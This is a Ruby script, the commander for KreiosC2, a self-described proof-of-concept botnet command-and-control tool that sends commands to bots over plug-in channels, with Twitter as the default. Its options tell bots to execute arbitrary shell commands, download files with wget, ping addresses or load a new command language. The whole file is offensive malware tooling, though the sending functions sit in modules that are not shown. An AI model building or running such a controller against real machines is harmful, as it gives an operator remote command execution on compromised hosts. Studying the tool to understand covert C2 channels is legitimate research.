#!/usr/bin/env ruby

require "getoptlong"
require 'digest/md5'
require 'default_command_language'
require "twitter_command_channel"

# == KreiosC2: The commander for a bot written to use various methods as its C&C
#
# KreiosC2 has been built to be a flexible command and control system, it takes 
# plug-ins which enable the communication to be made over various medium.
# It is a proof of concept only
#
# == Usage
# kreiosc2_command [OPTION]
#	--help, -h: show help
#	--get x, -g x: download (wget) the specified file
#	--ping x, -p x: ping the specified ip address
#	--language x, -l x: use the specified command language file
#	--channel x, -c x: use the specified command channel file
#	--use-dynamic x, -u x: send dynamic update command
#	--exec x, -e x: execute the specified command.
#			Add an & if you want the command to background otherwise it blocks the bot till finished
#	--status, -s: report on the number of API hits you have remaining
#	--verbose, -v: verbose
#
# Author:: Robin Wood (robin@digininja.org)
# Version:: 3.0
# Copyright:: Copyright (c) Robin Wood 2009
# Licence:: GPL
#

opts = GetoptLong.new(
	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
	[ '--status', '-s', GetoptLong::NO_ARGUMENT ],
	[ '--ping', "-p" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--language', "-l" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--channel', "-c" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--use-dynamic', "-u" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--get', "-g" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--exec', "-e" , GetoptLong::REQUIRED_ARGUMENT ],
	[ "--verbose", "-v" , GetoptLong::NO_ARGUMENT ]
)

# Display the usage
def usage
	puts"KreiosC2 3.0 Robin Wood (robin@digininja.org) (www.digininja.org)

Usage: kreiosc2_command [OPTION]
	--help, -h: show help
	--get x, -g x: download (wget) the specified file
	--ping x, -p x: ping the specified ip address
	--language x, -l x: use the specified command language file
	--channel x, -c x: use the specified command channel file
	--use-dynamic x, -u x: send dynamic update command
	--exec x, -e x: execute the specified command.
			Add an & if you want the command to background otherwise it blocks the bot till finished
	--status, -s: report on the number of API hits you have remaining (Only available with Twitter)
	--verbose, -v: verbose

"
	exit
end

verbose = false
filename=nil
command=nil
ip_address=nil
command_to_run=nil

begin
	opts.each do |opt, arg|
		case opt
		when '--help'
			usage
		when "--channel"
			channel_filename=arg
			if File.exists?(channel_filename)
				require channel_filename
			else
				if verbose
					puts "Protocol file not found, using Twitter"
				end
			end
		when "--language"
			filename=arg
			if File.exists?(filename)
				require filename
			else
				if verbose
					puts "Language file not found, using default"
				end
			end
		when "--use-dynamic"
			if command != nil
				puts "You can only specify one command at a time\n\n"
				usage()
			end
			filename=arg
			command="dynamic"
		when "--exec"
			if command != nil
				puts "You can only specify one command at a time\n\n"
				usage()
			end
			command_to_run=arg
			command="exec"
		when "--get"
			if command != nil
				puts "You can only specify one command at a time\n\n"
				usage()
			end
			filename=arg
			command="get"
		when "--ping"
			if command != nil
				puts "You can only specify one command at a time\n\n"
				usage()
			end
			ip_address=arg
			command="ping"
		when '--verbose'
			verbose=true
		when '--status'
			if command != nil
				puts "You can only specify one command at a time\n\n"
				usage()
			end
			command="status"
		end
	end
rescue
	usage
end

if command==nil
	usage
end

case command
	when "ping"
		send_ping_command(ip_address, verbose)
	when "dynamic"
		send_new_language_command(filename, verbose)
	when "exec"
		send_exec_command(command_to_run, verbose)
	when "get"
		send_get_command(filename, verbose)
	when "status"
		begin
			status()
		rescue NoMethodError
			puts "Status command unavailable"
		end
	when nil
		puts "No command specified"
		usage()
end
